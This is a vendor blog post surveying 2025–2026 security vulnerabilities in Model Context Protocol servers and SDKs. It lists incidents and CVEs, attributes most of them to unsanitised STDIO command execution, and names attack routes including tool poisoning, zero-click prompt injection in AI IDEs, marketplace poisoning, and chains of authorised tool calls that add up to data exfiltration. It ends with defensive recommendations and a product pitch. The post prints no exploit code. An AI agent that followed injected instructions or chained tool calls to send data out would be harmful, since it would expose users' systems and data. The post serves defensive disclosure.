Between January and April 2026, researchers disclosed over 40 CVEs against Model Context Protocol implementations across Python, TypeScript, Java, and Rust SDKs. The vulnerabilities affect Anthropic's reference servers, third-party tools with 150 million combined downloads, and 9 of 11 MCP marketplaces.
This post is cross-published from agentlair.dev.
Timeline of Vulnerabilities
2025 Incidents:
- April: WhatsApp tool poisoning attack
- May: GitHub MCP prompt injection
- June: Asana cross-tenant exposure; CVE-2025-49596 (CVSS 9.4)
- July: CVE-2025-6514 (437,000+ downloads affected, CVSS 9.6)
- August: Filesystem sandbox escape
- September: Postmark supply chain attack
- October: Smithery path traversal
2026 Escalation:
January–February saw 30+ CVEs filed in 60 days. January 20 marked three vulnerabilities in Anthropic's mcp-server-git reference implementation. April's Ox Security advisory detailed 10 high/critical CVEs, with 200,000 vulnerable servers estimated.
Vulnerability Breakdown
| Category | Share |
|---|---|
| Shell/exec injection | 43% |
| Tooling infrastructure flaws | 20% |
| Authentication bypass | 13% |
| Path traversal | 10% |
| Other (SSRF, supply chain) | 14% |
Root Cause: The STDIO Problem
MCP uses STDIO as its primary transport without sanitizing spawned command strings. The protocol's subprocess-based architecture makes command execution the default interface, inherited by every implementation. Four attack vectors emerged:
- Unauthenticated command injection via STDIO invocations
- Injection bypassing developer hardening measures
- Zero-click prompt injection in AI IDEs
- Marketplace poisoning via malicious MCP uploads
Anthropic's Response
Anthropic declined architectural modifications, characterizing the behavior as "expected" and placing sanitization responsibility on developers—despite survey data showing 82% of 2,614 implementations vulnerable to path traversal and 67% carrying injection risk.
Detection Gaps
Static analysis catches known patterns but misses sequence-level attacks where authorized tool calls combine into exfiltration pipelines. Behavioral monitoring addressing post-authorization activity represents the infrastructure gap.
Recommended Actions
- Immediate: Block public IP access; sandbox MCP services; treat external configuration as untrusted
- Structural: Implement behavioral monitoring tracking agent action sequences against baseline patterns
Key Statistic: One CVE filed approximately every four days throughout 2026.
AgentLair provides behavioral trust infrastructure for AI agents — persistent identity, credential isolation, and continuous behavioral monitoring.
Top comments (0)